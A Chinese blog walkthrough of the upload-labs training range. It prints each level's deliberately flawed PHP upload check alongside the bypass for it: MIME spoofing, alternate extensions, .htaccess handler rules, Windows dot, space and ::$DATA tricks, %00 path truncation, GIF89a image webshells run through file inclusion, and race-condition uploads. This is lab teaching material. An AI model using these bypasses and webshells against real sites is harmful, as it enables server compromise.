当前位置:   article > 正文

★文件上传漏洞与Upload-labs靶场分析实战

upload-labs
网站常用后缀名
php
php3
php5
phtml
asp
asa
cdx
cer
aspx
ashx
shtml
小知识:防火墙常见函数
<?php
$a="     Wo jin tian lai LE!    ";
$b=trim($a);   //trim() 首尾去空函数
echo $b; //Wo jin tian lai LE!
?>
<?php
$b=deldot($a);  // 删除文件名末尾的点
echo $b; //
?>
<?php
$a="wenjian.php"
$b=strrchr($a,'.');  //寻找相应位置并且输出及其之后的内容
echo $b; //.php   
?>
<?php
$a="HAHA ni hao";
$b=strtolower($a); //全部转为小写
echo $b;  //haha ni hao
?>
<?php
$a="abcdefg";
$b=str_ireplace("b","x",$a);  //在$a身上 用x替换b
echo $b; //axcdefg
?>
Pass-01  前端验证 JS验证(用java script去验证)
特点:查看页面源代码 可以查看到相应的script下的function函数
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }}
方法1:burp抓包绕过前端改木马的格式即可
方法2:前端html代码中找到checkfile() 函数 在var allow_ext=".jpg|.png|.gif|.php" 编辑添加php允许上传即可
方法3:删除前端中的on_click=checkfile() 函数 这样直接就可以把文件格式校验给删除掉了
方法4:火狐浏览器右上角直接关闭当前网页js的功能 禁用js就可以绕过验证了
Pass-02 MIME校验(拦截文件类型)
小知识
php默认的文件类型是:application/octet-stream
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }}
//可以把图片和一句话木马隐写合并 也可以传空图片格式 在burp中增加一句话木马的内容
方法1:burp抓包,修改Content-Type(文本类型) 为image/jpeg格式 之后就可以成功上传php了 不需要改后缀 这题没有校验这个
Pass-03 文件名解析绕过 (黑名单,其中的后缀都不允许上传)
小知识:
.php .php3 pht phtml php4都可以当作php执行
如何在Apache服务器中调整解析:
Apache-->httpd.conf--->搜索AddType--->添加 AddType application/x-httpd-php .php .pht .phtml
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']); //首尾去空
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空
        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;  //随机数命名           
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }}
方式1:可以上传时修改格式为php1--php9 或者phtml 有可能会成功解析
php1没有解析仅是文字显示  php5也没有解析 php9也没有解析
改格式为pht  之后上传完成功 也可以顺利被执行 
phtml上传成功 同时也成功解析了 可以直接操作
Pass-04  .htaccess文件绕过
小知识(实战不推荐使用这种方法,会把文件夹下所有你指定的东西当作php执行)
.htaccess是一个纯文本文件,里面存放着Apache服务器配置相关的一些指令,类似于Apache站点配置文件,只支持本目录(/upload)可以访问控制,url规则等等。
#define width 1337
#define height 1337
<FilesMatch "123pinfo.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
这里的意思就是将123pinfo.jpg按照php来解析
构造好文件后,将其改名为.htaccess(linux下改为htaccess 抓包改名加点) 先上传
123pinfo.jpg  再上传.htaccess文件 再去访问123pinfo.jpg 即可得到phpinfo界面
.htaccess文件是php的解析文件 根据文件写的规则,会把相应的东西当作php执行
//所有123pinfo.jpg都当作php来执行
<FilesMatch "123pinfo.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
//所有文件名中含有haha字样的文件都当作php来执行
<FilesMatch "haha">
SetHandler application/x-httpd-php
</FilesMatch>
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])) {
  4.     if (file_exists(UPLOAD_PATH)) {
  5.         $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
  6.         $file_name = trim($_FILES['upload_file']['name']);
  7.         $file_name = deldot($file_name);//删除文件名末尾的点
  8.         $file_ext = strrchr($file_name, '.');
  9.         $file_ext = strtolower($file_ext); //转换为小写
  10.         $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
  11.         $file_ext = trim($file_ext); //收尾去空
  12.         if (!in_array($file_ext, $deny_ext)) {
  13.             $temp_file = $_FILES['upload_file']['tmp_name'];
  14.             $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
  15.             if (move_uploaded_file($temp_file, $img_path)) {
  16.                 $is_upload = true;
  17.             } else {
  18.                 $msg = '上传出错!';
  19.             }
  20.         } else {
  21.             $msg = '此文件不允许上传!';
  22.         }
  23.     } else {
  24.         $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  25.     }}
方法1:先修改好.htaccess文件(如果规则是图片用php解析的话)并上传(可以直接文件名不加后缀 传相应的名字和jpg后缀也可以)
然后上传图片格式的文件木马 里面有php一句话木马 也可以burp中添加一句话木马语句
之后访问图片地址就可以对其进行php的方式解析了
方法2:.htaccess文件中 FileMatch直接写haha  直接上传的文件名可以是a.haha  这样haha也可以被当做php执行 同样可行
Pass-05  文件包含漏洞绕过/文件后缀名大小写绕过
小知识:
windows系统不区分大小写 linux系统严格区分大小写
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])) {
  4.     if (file_exists(UPLOAD_PATH)) {
  5.         $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
  6.         $file_name = trim($_FILES['upload_file']['name']);
  7.         $file_name = deldot($file_name);//删除文件名末尾的点
  8.         $file_ext = strrchr($file_name, '.');
  9.         $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
  10.         $file_ext = trim($file_ext); //首尾去空
  11.         if (!in_array($file_ext, $deny_ext)) {
  12.             $temp_file = $_FILES['upload_file']['tmp_name'];
  13.             $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
  14.             if (move_uploaded_file($temp_file, $img_path)) {
  15.                 $is_upload = true;
  16.             } else {
  17.                 $msg = '上传出错!';
  18.             }
  19.         } else {
  20.             $msg = '此文件类型不允许上传!';
  21.         }
  22.     } else {
  23.         $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  24.     }}
方法1:文件包含漏洞绕过(php的文件包含会将任何一个文件当做php来执行
条件:httpd.conf中开启改为 allow_url_include=1
(1)将php木马的后缀改成jpg等图片格式然后上传成功  如haha.jpg
(2)开始进行文件包含即可
本地文件包含http://127.0.0.1/include.php?file=./upload/haha.jpg 
//远程文件包含  http://127.0.0.1/include.php?file=http://127.0.0.1/upload/haha.jpg
方法2:大小写绕过
haha.phP文件名即可过滤掉 
Pass-06  windows空格绕过
小知识:
相比之下少了一个首尾去空的函数
windows空格绕过
文件后缀名不允许存在空格 如果存在 windows会自动把空格去掉
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])) {
  4.     if (file_exists(UPLOAD_PATH)) {
  5.         $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
  6.         $file_name = $_FILES['upload_file']['name'];
  7.         $file_name = deldot($file_name);//删除文件名末尾的点
  8.         $file_ext = strrchr($file_name, '.');
  9.         $file_ext = strtolower($file_ext); //转换为小写
  10.         $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
  11.         
  12.         if (!in_array($file_ext, $deny_ext)) {
  13.             $temp_file = $_FILES['upload_file']['tmp_name'];
  14.             $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
  15.             if (move_uploaded_file($temp_file,$img_path)) {
  16.                 $is_upload = true;
  17.             } else {
  18.                 $msg = '上传出错!';
  19.             }
  20.         } else {
  21.             $msg = '此文件不允许上传';
  22.         }
  23.     } else {
  24.         $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  25.     }}
用burp抓包haha.php文件 上传后在php后面加个空格再上传就可以了 主要是绕过服务器上传的限制 并不影响windows那边的文件后缀
Pass-07 windows点绕过
windows系统的后缀不允许存在点 如果有会自动删除
特殊文件名绕过:(点绕过/空格绕过)
比如发送的http包里把文件名改成test.asp.  或者 test.asp_ (下划线为空格)
这种命名方式在windows系统中是不被允许的,所以需要在burp中修改再上传,然后绕过验证之后,会被windows系统自动去掉后面的点和空格
但要注意unix/linux系统没有这个特性
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])) {
  4.     if (file_exists(UPLOAD_PATH)) {
  5.         $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
  6.         $file_name = trim($_FILES['upload_file']['name']);
  7.         $file_ext = strrchr($file_name, '.');
  8.         $file_ext = strtolower($file_ext); //转换为小写
  9.         $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
  10.         $file_ext = trim($file_ext); //首尾去空
  11.         
  12.         if (!in_array($file_ext, $deny_ext)) {
  13.             $temp_file = $_FILES['upload_file']['tmp_name'];
  14.             $img_path = UPLOAD_PATH.'/'.$file_name;
  15.             if (move_uploaded_file($temp_file, $img_path)) {
  16.                 $is_upload = true;
  17.             } else {
  18.                 $msg = '上传出错!';
  19.             }
  20.         } else {
  21.             $msg = '此文件类型不允许上传!';
  22.         }
  23.     } else {
  24.         $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  25.     }}
上传haha.php 之后burp抓包 把文件名改成 haha.php.  这样上传成功以后 windows服务器那里会自动改成haha.php 成功绕过服务器限制
Pass-08 windows ::$DATA绕过
::$DATA  是windows的NTFS文件系统中的默认属性
::$DATA 绕过方式:
针对的目标系统是windows 表示以流的形式进行绕过
会把::$DATA本身及其之后的内容当作数据流 仅保留::$DATA之前的文件名内容
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])) {
  4.     if (file_exists(UPLOAD_PATH)) {
  5.         $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
  6.         $file_name = trim($_FILES['upload_file']['name']);
  7.         $file_name = deldot($file_name);//删除文件名末尾的点
  8.         $file_ext = strrchr($file_name, '.');
  9.         $file_ext = strtolower($file_ext); //转换为小写
  10.         $file_ext = trim($file_ext); //首尾去空
  11.         
  12.         if (!in_array($file_ext, $deny_ext)) {
  13.             $temp_file = $_FILES['upload_file']['tmp_name'];
  14.             $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
  15.             if (move_uploaded_file($temp_file, $img_path)) {
  16.                 $is_upload = true;
  17.             } else {
  18.                 $msg = '上传出错!';
  19.             }
  20.         } else {
  21.             $msg = '此文件类型不允许上传!';
  22.         }
  23.     } else {
  24.         $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  25.     }}
上传的时候将文件名改成 123.php::$DATA即可上传成功
上传成功后访问时直接把::$DATA忽视即可 直接访问相应的php结尾的文件
Pass-09 windows追加执行(点空格组合绕过,追加绕过)
程序是从上到下执行的 所以它拦截多少次 只要有次数,我们就多一次就行
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])) {
  4.     if (file_exists(UPLOAD_PATH)) {
  5.         $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
  6.         $file_name = trim($_FILES['upload_file']['name']);
  7.         $file_name = deldot($file_name);//删除文件名末尾的点
  8.         $file_ext = strrchr($file_name, '.');
  9.         $file_ext = strtolower($file_ext); //转换为小写
  10.         $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
  11.         $file_ext = trim($file_ext); //首尾去空
  12.         
  13.         if (!in_array($file_ext, $deny_ext)) {
  14.             $temp_file = $_FILES['upload_file']['tmp_name'];
  15.             $img_path = UPLOAD_PATH.'/'.$file_name;
  16.             if (move_uploaded_file($temp_file, $img_path)) {
  17.                 $is_upload = true;
  18.             } else {
  19.                 $msg = '上传出错!';
  20.             }
  21.         } else {
  22.             $msg = '此文件类型不允许上传!';
  23.         }
  24.     } else {
  25.         $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  26.     }}
方法1:点空格点绕过  burp抓包修改文件名为xxx.php. .   上传之后空格和点被过滤还剩下一个点 正好绕过服务器限制
方法2:用burp抓包放到Repeater模块中,抓包修改文件名为haha.php:.jpg  后上传成功
但是是空xxx.php的文件   再次修改文件名为:haha.>>>  然后上传  此时是在其中写入内容
也就是上传的是 xxx.php:.jpg  会生成xxx.php的文件 再次上传xxx.>>> 就会在文件中写入代码
Pass-10 双写绕过
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])) {
  4.     if (file_exists(UPLOAD_PATH)) {
  5.         $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
  6.         $file_name = trim($_FILES['upload_file']['name']);
  7.         $file_name = str_ireplace($deny_ext,"", $file_name);
  8.         $temp_file = $_FILES['upload_file']['tmp_name'];
  9.         $img_path = UPLOAD_PATH.'/'.$file_name;        
  10.         if (move_uploaded_file($temp_file, $img_path)) {
  11.             $is_upload = true;
  12.         } else {
  13.             $msg = '上传出错!';
  14.         }
  15.     } else {
  16.         $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
  17.     }}
filename=haha.pphphp
Pass-11 GET路径绕过(%00截断) (GET请求和POST请求可以同时发生)(GET请求中遇到%00 其及其后面的内容都会被注释 忽略不计)
burp抓包分析发现 POST型提交头中有一个save_path=../upload/  可以被用于GET提交参数
不妨尝试修改这个GET的参数 save_path=../upload/haha.php  将其修改为一个php文件  但是文件没有子目录 所以没办法上传成功
根据SQL注入的思想 可以把后续的部分给注释掉 这样就相当于存储文件了 在GET中可以通过%00 进行注释截断
但是可以修改上传目录是/upload/123.php 之后上传的是图片文件
两个文件的后缀就可以进行拼接 123.phpxbw.jpg
所以如果修改上传目录是 /upload/123.php%00
那么xbw.jpg就会被%00给注释掉 拼接完文件名就是123.php 也就实现了绕过
%00是url编码 由ascii码转化而来的 其可以截断后缀 其本身解析完也是不可见的
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
        //strrpos用于定位点所在的位置(如果是针对的是最后一个点 也就是点最后一次出现的地方) 
        //之后借助substr 也就是从点后面的第一个位置开始剪切出来到$file_ext中
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }}
save_path=../upload/haha.php%00.jpg  //%00后面的内容也不重要 能绕过服务器就行
filename=m.jpg   //文件名不重要
修改完提交即可 相应文件的内容会直接传输到haha.php 可以直接访问
Pass-12 POST路径绕过  (%00截断 先url编码再上传)
小知识:
%xx的情况 POST不会像GET那样对其进行解码 尤其是%00
  1. $is_upload = false;
  2. $msg = null;
  3. if(isset($_POST['submit'])){
  4.     $ext_arr = array('jpg','png','gif');
  5.     $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
  6.     if(in_array($file_ext,$ext_arr)){
  7.         $temp_file = $_FILES['upload_file']['tmp_name'];
  8.         $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
  9.         if(move_uploaded_file($temp_file,$img_path)){
  10.             $is_upload = true;
  11.         } else {
  12.             $msg = "上传失败";
  13.         }
  14.     } else {
  15.         $msg = "只允许上传.jpg|.png|.gif类型文件!";
  16.     }}
方法1:这关的save_path相比于第11关位置发生了变化而已(出现在了post请求正文中)
此时在post正文 url编码不能被解析 所以需要借助burp对其进行一次url解码 URL-Decode
再次上传也就成功了
../upload/haha.php%00.jpg  然后把%00圈起来右键 Convert selectiong->URL->URL decode
filename="m.jpg"
方法2:修改目录为 /upload/123.php 123
修改hex 把20修改成00也可以上传成功
Pass-13 图片木马文件头验证绕过
首先制作一个简单的图片木马:
GIF89a
<?php phpinfo() ?>
function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);
    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }}
1.上传相应的图片木马绕过检测  gif89a
2.通过文件包含去执行相应的图片木马
http://127.0.0.1/include.php?file=./upload/xxx(图片马上传后的名字)xx.gif
Pass-14 图片木马文件头验证绕过
首先制作一个简单的图片木马:
GIF89a
<?php phpinfo() ?>
  1. function isImage($filename){
  2.     $types = '.jpeg|.png|.gif';
  3.     if(file_exists($filename)){
  4.         $info = getimagesize($filename);
  5.         $ext = image_type_to_extension($info[2]);
  6.         if(stripos($types,$ext)>=0){
  7.             return $ext;
  8.         }else{
  9.             return false;
  10.         }
  11.     }else{
  12.         return false;
  13.     }}
  14. $is_upload = false;
  15. $msg = null;
  16. if(isset($_POST['submit'])){
  17.     $temp_file = $_FILES['upload_file']['tmp_name'];
  18.     $res = isImage($temp_file);
  19.     if(!$res){
  20.         $msg = "文件未知,上传失败!";
  21.     }else{
  22.         $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
  23.         if(move_uploaded_file($temp_file,$img_path)){
  24.             $is_upload = true;
  25.         } else {
  26.             $msg = "上传出错!";
  27.         }
  28.     }}
方法1:
1.上传相应的图片木马绕过检测  gif89a
2.通过文件包含去执行相应的图片木马
http://127.0.0.1/include.php?file=./upload/xxx(图片马上传后的名字)xx.gif
Pass-15 图片木马文件头验证绕过
首先制作一个简单的图片木马:
GIF89a
<?php phpinfo() ?>
  1. function isImage($filename){
  2.     //需要开启php_exif模块
  3.     $image_type = exif_imagetype($filename);
  4.     switch ($image_type) {
  5.         case IMAGETYPE_GIF:
  6.             return "gif";
  7.             break;
  8.         case IMAGETYPE_JPEG:
  9.             return "jpg";
  10.             break;
  11.         case IMAGETYPE_PNG:
  12.             return "png";
  13.             break;    
  14.         default:
  15.             return false;
  16.             break;
  17.     }}
  18. $is_upload = false;
  19. $msg = null;
  20. if(isset($_POST['submit'])){
  21.     $temp_file = $_FILES['upload_file']['tmp_name'];
  22.     $res = isImage($temp_file);
  23.     if(!$res){
  24.         $msg = "文件未知,上传失败!";
  25.     }else{
  26.         $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
  27.         if(move_uploaded_file($temp_file,$img_path)){
  28.             $is_upload = true;
  29.         } else {
  30.             $msg = "上传出错!";
  31.         }
  32.     }}
方法1:
1.上传相应的图片木马绕过检测 gif89a
2.通过文件包含去执行相应的图片木马
http://127.0.0.1/include.php?file=./upload/xxx(图片马上传后的名字)xx.gif
Pass-16  渲染图片马的绕过/穷举爆破上传
  1. $is_upload = false;
  2. $msg = null;
  3. if (isset($_POST['submit'])){
  4.     // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
  5.     $filename = $_FILES['upload_file']['name'];
  6.     $filetype = $_FILES['upload_file']['type'];
  7.     $tmpname = $_FILES['upload_file']['tmp_name'];
  8.     $target_path=UPLOAD_PATH.'/'.basename($filename);
  9.     // 获得上传文件的扩展名
  10.     $fileext= substr(strrchr($filename,"."),1);
  11.     //判断文件后缀与类型,合法才进行上传操作
  12.     if(($fileext == "jpg") && ($filetype=="image/jpeg")){
  13.         if(move_uploaded_file($tmpname,$target_path)){
  14.             //使用上传的图片生成新的图片
  15.             $im = imagecreatefromjpeg($target_path);
  16.             if($im == false){
  17.                 $msg = "该文件不是jpg格式的图片!";
  18.                 @unlink($target_path);    //删除
  19.             }else{
  20.                 //给新图片指定文件名
  21.                 srand(time());
  22.                 $newfilename = strval(rand()).".jpg";
  23.                 //显示二次渲染后的图片(使用用户上传图片生成的新图片)
  24.                 $img_path = UPLOAD_PATH.'/'.$newfilename;
  25.                 imagejpeg($im,$img_path);
  26.                 @unlink($target_path);
  27.                 $is_upload = true;
  28.             }
  29.         } else {
  30.             $msg = "上传出错!";
  31.         }
  32.     }else if(($fileext == "png") && ($filetype=="image/png")){
  33.         if(move_uploaded_file($tmpname,$target_path)){
  34.             //使用上传的图片生成新的图片
  35.             $im = imagecreatefrompng($target_path);
  36.             if($im == false){
  37.                 $msg = "该文件不是png格式的图片!";
  38.                 @unlink($target_path);
  39.             }else{
  40.                  //给新图片指定文件名
  41.                 srand(time());
  42.                 $newfilename = strval(rand()).".png";
  43.                 //显示二次渲染后的图片(使用用户上传图片生成的新图片)
  44.                 $img_path = UPLOAD_PATH.'/'.$newfilename;
  45.                 imagepng($im,$img_path);
  46.                 @unlink($target_path);
  47.                 $is_upload = true;               
  48.             }
  49.         } else {
  50.             $msg = "上传出错!";
  51.         }
  52.     }else if(($fileext == "gif") && ($filetype=="image/gif")){
  53.         if(move_uploaded_file($tmpname,$target_path)){
  54.             //使用上传的图片生成新的图片
  55.             $im = imagecreatefromgif($target_path);
  56.             if($im == false){
  57.                 $msg = "该文件不是gif格式的图片!";
  58.                 @unlink($target_path);
  59.             }else{
  60.                 //给新图片指定文件名
  61.                 srand(time());
  62.                 $newfilename = strval(rand()).".gif";
  63.                 //显示二次渲染后的图片(使用用户上传图片生成的新图片)
  64.                 $img_path = UPLOAD_PATH.'/'.$newfilename;
  65.                 imagegif($im,$img_path);
  66.                 @unlink($target_path);
  67.                 $is_upload = true;
  68.             }
  69.         } else {
  70.             $msg = "上传出错!";
  71.         }
  72.     }else{
  73.         $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
  74.     }}
方法1:上传一个已经被渲染的图片木马,然后通过文件包含漏洞把文件包含进来就可以了
方法2:
BUG点:通过后缀和类型审核以后,会先把文件放到服务器上,再进行判断
可以通过burp抓包 进入爆破模块不停的对随便一个参数穷举 速度足够快的话文件就会约等于一直在服务器
只要传的足够快 服务器就删除不过来,当来不及删除的东西留下了了 我们就可以去访问相应的木马文件了
Pass-17  穷举爆破上传(条件竞争之竞争删除)
  1. $is_upload = false;$msg = null;
  2. if(isset($_POST['submit'])){
  3.     $ext_arr = array('jpg','png','gif');
  4.     $file_name = $_FILES['upload_file']['name'];
  5.     $temp_file = $_FILES['upload_file']['tmp_name'];
  6.     $file_ext = substr($file_name,strrpos($file_name,".")+1);
  7.     $upload_file = UPLOAD_PATH . '/' . $file_name;
  8.     if(move_uploaded_file($te mp_file, $upload_file)){
  9.         if(in_array($file_ext,$ext_arr)){
  10.              $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
  11.              rename($upload_file, $img_path);
  12.              $is_upload = true;
  13.         }else{
  14.             $msg = "只允许上传.jpg|.png|.gif类型文件!";
  15.             unlink($upload_file);
  16.         }
  17.     }else{
  18.         $msg = '上传出错!';
  19.     }}
代码逻辑:首先把文件移动到文件夹中,然后再进行判断
穷举逻辑和16题一样
漏洞点:文件是先成功上传以后再判断是否符合要求,不符合要求再去删除。而不是之前那种先判断后决定要不要上传,所以存在漏洞。
包放到爆破模块去,随便标记一个无关紧要的内容,然后开始攻击,有概率删除不成功。
Pass-18 条件竞争之竞争重命名
代码越多 做的事情就越多 频率很快 服务器就会来不及处理 就会出现条件竞争从而上传成功
原理:文件传上去 之后帮我们进行重命名  
如果看到代码中出现 .7z .zip .rar .gz 这种压缩类型的文件
php有可能会自动解压 把里面的代码放出来
//index.php$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    require_once("./myupload.php");
    $imgFileName =time();  //以当前的时间对文件进行命名
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break;
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break;
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break;
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break;
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break;
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break;
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }}
//myupload.phpclass MyUpload{..................
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );
..................  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }
    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }
    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
